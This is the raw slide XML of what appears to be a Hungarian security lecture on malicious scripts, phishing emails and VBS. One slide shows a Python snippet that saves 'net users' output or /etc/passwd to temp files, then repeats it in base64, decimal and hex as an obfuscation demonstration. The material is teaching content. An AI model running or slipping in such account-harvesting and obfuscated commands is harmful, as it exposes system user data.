                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	os.system('cmd /C net users &gt; "C:\Windows\Temp\usr.txt"')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	os.system('cat /etc/passwd &gt; /tmp/pwd.txt')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Csoportba foglalás 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14121343-F72A-447A-BC14-40D651B2EDB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2071368" y="3815447"/>
            <a:ext cx="7909560" cy="1673905"/>
            <a:chOff x="2071368" y="4143278"/>
            <a:chExt cx="7909560" cy="1673905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Szövegdoboz 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957EE4FA-7894-47FA-A572-445B4914B8F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2071368" y="4616854"/>
              <a:ext cx="7909560" cy="120032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hu-HU">
                  <a:solidFill>
                    <a:srgbClr val="92D050"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>b3NwbGF0PXBsYXRmb3JtLnN5c3RlbSgpCmlmIG9zcGxhdD09IldpbmRvd3MiOgoJb3Muc3lzdGVtKCdjbWQgL0MgbmV0IHVzZXJzID4gIkM6XFdpbmRvd3NcVGVtcFx1c3IudHh0IicpCmVsc2U6Cglvcy5zeXN0ZW0oJ2NhdCAvZXRjL3Bhc3N3ZCA+IC90bXAvcHdkLnR4dCcpCg==</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Szövegdoboz 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7847F341-B32E-4540-8A35-9262F948C729}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4625023" y="4143278"/>
              <a:ext cx="2941953" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="hu-HU">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>base64</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Csoportba foglalás 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24A5EFF7-7C9C-4C87-91E8-F85805DE6999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2071368" y="3820112"/>
            <a:ext cx="7909560" cy="1673905"/>
            <a:chOff x="1260146" y="3999056"/>
            <a:chExt cx="7909560" cy="1673905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Szövegdoboz 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9AB4283-0FE2-43F6-B0D9-DB0B47B1E8AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1260146" y="4472632"/>
              <a:ext cx="7909560" cy="120032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hu-HU">
                  <a:solidFill>
                    <a:srgbClr val="92D050"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>111 115 112 108 97 116 61 112 108 97 116 102 111 114 109 46 115 121 115 116 101 109 40 41 10 105 102 32 111 115 112 108 97 116 61 61 34 87 105 110 100 111 119 115 34 58 10 9 111 115 46 115 121 115 116 101 109 40 [...]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Szövegdoboz 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A26441-E290-49F1-BD1D-C1617AE54845}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3813801" y="3999056"/>
              <a:ext cx="2941953" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="hu-HU">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>decimal</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Csoportba foglalás 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA3EBF60-1673-477F-9DE6-BA5A04504945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2071368" y="3820112"/>
            <a:ext cx="7909560" cy="1673905"/>
            <a:chOff x="1260146" y="3999056"/>
            <a:chExt cx="7909560" cy="1673905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Szövegdoboz 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F9C8D3-63B1-4898-BEAE-A80F314DF3EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1260146" y="4472632"/>
              <a:ext cx="7909560" cy="120032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hu-HU">
                  <a:solidFill>
                    <a:srgbClr val="92D050"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>6f 73 70 6c 61 74 3d 70 6c 61 74 66 6f 72 6d 2e 73 79 73 74 65 6d 28 29 0a 69 66 20 6f 73 70 6c 61 74 3d 3d 22 57 69 6e 64 6f 77 73 22 3a 0a 09 6f 73 2e 73 79 73 74 65 6d 28 27 63 6d 64 20 2f 43 20 6e 65 74 20 [...]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Szövegdoboz 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6EE03FD-1C65-4EBF-975F-E446ED5446C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3813801" y="3999056"/>
              <a:ext cx="2941953" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="hu-HU">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hexa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117108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E7A70C21-0C2D-48D1-B77D-596C1F38F52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785360" y="605176"/>
            <a:ext cx="6523988" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053A3859-1B85-4547-A8C1-DC39E96F7350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="1363983"/>
            <a:ext cx="10566399" cy="369565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adathalász e-mail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A936F6-6200-46E2-B5A7-259A341B6274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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Kép 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A0D61F8-60E9-4D5F-ACE9-343D397B49EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481137" y="1978840"/>
            <a:ext cx="9229725" cy="3182664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397035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E7A70C21-0C2D-48D1-B77D-596C1F38F52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785360" y="605176"/>
            <a:ext cx="6523988" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053A3859-1B85-4547-A8C1-DC39E96F7350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="1363983"/>
            <a:ext cx="10566399" cy="369565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A936F6-6200-46E2-B5A7-259A341B6274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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Kép 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D045762A-6956-4676-8DAC-83218670B3B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="742946" y="1806886"/>
            <a:ext cx="10566401" cy="3782239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Kép 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7332080-93A5-4DED-AF12-164461692173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2759071" y="5862637"/>
            <a:ext cx="6534150" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Kép 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06B172A-1ABA-4F79-BF9A-68EA47DC567C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1733549"/>
            <a:ext cx="10566400" cy="2747003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Csoportba foglalás 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48156774-EB3E-4661-B805-B5FD00136246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="794989" y="2118509"/>
            <a:ext cx="9070194" cy="463844"/>
            <a:chOff x="794989" y="2118509"/>
            <a:chExt cx="9070194" cy="463844"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Ellipszis 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24AAD34C-EF09-4998-9107-40A021377745}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2280978" y="2118510"/>
              <a:ext cx="139398" cy="22051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 name="Ellipszis 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{291E2F00-677A-4AA3-B6E4-13BFC3A30084}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3774400" y="2118510"/>
              <a:ext cx="139398" cy="22051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Ellipszis 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5ED7C9-2740-428C-A00C-2DF3DB5402FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5267822" y="2118510"/>
              <a:ext cx="139398" cy="22051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Ellipszis 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06B42F94-39D5-4E3A-B8D4-5B6161E89A60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6761244" y="2118510"/>
              <a:ext cx="139398" cy="22051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Ellipszis 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C5DBF54-34C6-47D0-83DF-53B4788ED3B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8254666" y="2118510"/>
              <a:ext cx="139398" cy="22051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Ellipszis 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{513079FD-B718-4C44-A8E9-4ED7A465B398}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2288412" y="2361843"/>
              <a:ext cx="139398" cy="22051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 name="Ellipszis 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280B0BA3-E4D8-4159-88A5-4F904EC35A92}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3781834" y="2361843"/>
              <a:ext cx="139398" cy="22051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Ellipszis 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A872387-C830-48C4-8166-8DF82915158A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5275257" y="2361843"/>
              <a:ext cx="139398" cy="22051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 name="Ellipszis 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7569E7CD-FCA2-43EB-B3AF-3C446885C409}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9725785" y="2118509"/>
              <a:ext cx="139398" cy="22051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 name="Ellipszis 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C697E6D0-BBEE-4B52-A1F3-9448423C902D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="794989" y="2361843"/>
              <a:ext cx="139398" cy="22051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pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Kép 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AEC8CCF-CC3E-4DA8-A82F-B8F08A5DC556}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="2505075"/>
            <a:ext cx="10566397" cy="1823738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D70E2E2-CBE6-19A8-40CB-168E35C09D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1138555" y="3010383"/>
            <a:ext cx="9886569" cy="1802917"/>
            <a:chOff x="975360" y="3010383"/>
            <a:chExt cx="9886569" cy="1802917"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7" name="Egyenes összekötő 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A003E30-96C4-4DF5-9F07-0EF462316D8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="975360" y="3019090"/>
              <a:ext cx="1689100" cy="1794210"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Egyenes összekötő 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013E6998-7872-5AE8-8ADD-6F1A256B261C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2003933" y="3017520"/>
              <a:ext cx="1689100" cy="1794210"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
